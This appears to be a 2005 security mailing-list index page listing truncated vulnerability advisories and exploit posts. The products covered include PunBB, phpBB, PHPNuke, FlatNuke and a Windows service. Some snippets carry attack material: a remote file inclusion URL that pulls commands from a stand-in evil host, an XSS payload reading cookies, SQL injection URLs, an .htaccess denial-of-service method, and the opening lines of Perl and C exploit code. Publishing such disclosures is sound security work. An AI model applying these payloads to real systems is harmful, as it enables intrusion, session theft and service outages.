|
Colapse all |
Post message
Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through 2005-10-25 Andrey Bayora (andrey securityelf org) [SECURITY] [DSA 871-1] New libgda2 packages fix arbitrary code execution 2005-10-25 joey infodrom org (Martin Schulze) iDEFENSE Security Advisory 10.24.05: SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability 2005-10-24 iDEFENSE Labs (labs-no-reply idefense com) SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability iDEFENSE Security Advisory 10.24.05 http://www.idefense.com/application/poi/display?type=vulnerabilities October 24, 2005 I. BACKGROUND SCO OpenServer is a UNIX-like operating system for x86 platforms. II. DESCRIPTION Local exploitati [ more ] [ reply ] Flat Nuke Cross Site Scripting 2005-10-24 alex aleksanet com Web Site: Vulnerable: FlatNuke <= 2.5.6 This script is possibly vulnerable to Cross Site Scripting (XSS) attacks Malicious users may inject JavaScript, VBScript, ActiveX, into a vulnerable application to fool a user in order to gather data from them. Affects http://[target]TEST/flatnuke-2.5.6 [ more ] [ reply ] php < 4.4.1 htaccess apache dos 2005-10-24 Eric Romang / ZATAZ.com (exploits zataz net) Hello, Here under some stuff to dos apache + php just through an htaccess. * With .htaccess method : If you have into your php.ini -> safe_mode = On Simply put a .htaccess file on the root directory of your website with this content : php_value session.save_path /var/www/somewherehowexist Apac [ more ] [ reply ] SQL saphp Lesson 2005-10-24 almaster hotmail com saphp Lesson .. Search By Google :- saphp Lesson Gr33tz :- aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com [email concealed]|- Devil-00 .. SQL Injection's Exploting - | devil-00 (at) s4a (dot) cc [email concealed] | - Security4Arab .. A'Where Home .. 1- SQL Injection in showcat.php http://www.si [ more ] [ reply ] [KAPDA::#8] Domain Manager Pro Vulnerability 2005-10-21 advisory securityfocus com, kapda ir securityfocus com [KAPDA::#8] Domain Manager Pro Vulnerability Domain Manager Pro - Fake form injection KAPDA New advisory Vulnerable Products : Domain Manager Pro Vendor: SiteTurn ,http://www.siteturn.com/ Vulnerability: Fake form injection ( XSS) Date : -------------------- 2005/08/08 1384/05/17 (Hijri Shamsi [ more ] [ reply ] Revised draft on ICMP attacks 2005-10-24 Fernando Gont (fernando gont com ar) Folks, I have published a revision of my draft on ICMP attacks against TCP. Some new stuff you may find interesting is a corner case for the attack against the PMTUD mechanism, that could allow an attacker to freeze TCP connections, even those secured by means of IPSec. You can find that stuff [ more ] [ reply ] aRCHILLES Newsworld < 1.5.0-rc1 Multiple Vulnerabilities 2005-10-21 chburchert web de aRCHILLES Newsworld < 1.5.0-rc1 Multiple Vulnerabilities Software: aRCHILLES Newsworld Vulnerable versions: <= 1.5.0-rc1 Type: Information Disclosure, Login Bypass Risk: Critical Date: 21st October 2005 Vendor: aRCHILLES (http://www.scriptworld.kh-webcenter.de) Credit: ======= These vulnerabiliti [ more ] [ reply ] [security bulletin] SSRT051055 rev.0 - HP Oracle for OpenView (OfO) Critical Patch Update October 2005 2005-10-24 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 HP SECURITY BULLETIN HPSBMA01235 REVISION: 0 SSRT051055 rev.0 - HP Oracle for OpenView (OfO) Critical Patch Update October 2005 NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. INITIAL RELEASE: 23 Octob [ more ] [ reply ] Nuked klan 1.7: Remote Exploit 2005-10-24 papipsycho hotmail com #!/usr/bin/perl use LWP::Simple; if (@ARGV != 2) { print "\n Nuked klan 1.7: Remote Exploit\n"; print "---------------------------------------------\n\n"; print " Coded By Papipsycho for G00t R0t ? \n Contact: papipsycho (at) hotmail (dot) com [email concealed]\n\n"; print "[!] usage: perl $0 [host] [user]\n"; print "[? [ more ] [ reply ] File Including In FLAT NUKE 2005-10-22 abducter_minds yahoo com Class: Input Validation Error CVE: CVE-MAP-NOMATCH Remote: Yes Local: No Credit: Abducter (ABDUCTER_MINDS (at) YAHOO (dot) COM [email concealed]) Or (ABDUCTER_MINDS76 (at) HOTMAIL (dot) COM [email concealed]) Vulnerable: File Including In FLAT NUKE (ALL VERSION) * info * FLAT NUKE IS POWER PHP SITES SUPPORT HERE http://flatnuke.sourceforge.n [ more ] [ reply ] Zomplog Script Injection Vulnerability =>3.4 (all versions vulnerable) 2005-10-22 sikikmail gmail com zomplog is prone to xss injection attacks. It is possible for a malicious zomplog user to inject hostile xss and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of zomplog. zomplog does not adequately filter xss tags fr [ more ] [ reply ] Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability 2005-10-22 Stefan Esser (sesser hardened-php net) Remote File Inclusion in forum PunBB 2005-10-24 rod hedor (rodhedor hotmail com) Remote File Inclusion in forum PunBB Date:24/10/2005 Severity: High version: 1.1.2 >> 1.1.5 The bug reside in common.php Exploit : http://www.host.com/forum/include/common.php?pun_root=http://www.host_ev il.com/cmd?&=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com ______________ [ more ] [ reply ] DCP - portal XSS & SQL attacks 2005-10-24 alex aleksanet com Web Site: http://www.dcp-portal.org/ DCP Portal <= v6 This script is possibly vulnerable to SQL Injection attacks AND Cross Site Scripting (XSS) attacks The script has been tested with these query variables: XSS : http://[target]/index.php?page=send&cid=<script>alert(document.cookie);< /script [ more ] [ reply ] SUSE Security Announcement: permissions (SUSE-SA:2005:062) 2005-10-24 Ludwig Nussel (ludwig nussel suse de) DBoardGear SQL Injection 2005-10-24 almaster hotmail com DboardGear .. Search By Google :- by DboardGear Gr33tz :- aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com [email concealed]|- Security4Arab .. A'Where Home .. 1- SQL Injection in buddy.php http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR 2-SQL Injection in u2 [ more ] [ reply ] PhpNuke 7.8 with all security fixes/patches "Your_Account", "Downloads", "Web Links" SQL Injection / Remote commans execution 2005-10-23 retrogod aliceposta it PHPNuke 7.8 with all security fixes/patches "Downloads", "Web_Links" & "Your_Account" SQL INjection -> remote commands execution poc exploit there are a lot of unsanitized vars in every module, as I can see, so if magic_quotes_gpc is Off -> SQL INJECTION 1) you can go to "Your Account" and submit [ more ] [ reply ] Insecure Temporary Files in BMC/Control-M Agent 2005-10-22 Scott Cromar (scottcromar yahoo com) BMC's Control M is an enterprise scheduling facility. Unfortunately, the agent software suffers from a problem with insecure temporary file creation. We noticed the problem on Solaris systems running the version 6.1.03 with current patches; it is reasonable to assume that other OS platforms an [ more ] [ reply ] phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit. 2005-10-22 alphakgen gmail com phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit. I sent the report to phpBB and they said that a patch will be available withing a few days and It will be integrated into 2.0.18 . Note: This works like XSS, and requires the victim to use IE (Affects all versions of IE). Spec [ more ] [ reply ] Windows UMPNPMGR wsprintfW Stack Buffer Overflow Vulnerability PoC 2005-10-21 ppwd25 hotmail com #include <stdio.h> #include <windows.h> #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") unsigned char szBindString[] = { 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x 00,0x00, 0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x 01,0x00, [ more ] [ reply ] Secunia Research: ZipGenius Multiple Archive Handling BufferOverflow 2005-10-21 Secunia Research (vuln secunia com) |
|
Privacy Statement |
forged magic byte.
AUTHOR: Andrey Bayora (www.securityelf.org)
For more details, screenshots and examples please read my article "The Magic
of magic byte" at www.securityelf.org . In addition, you will find a sample
"t
[ more ] [ reply ]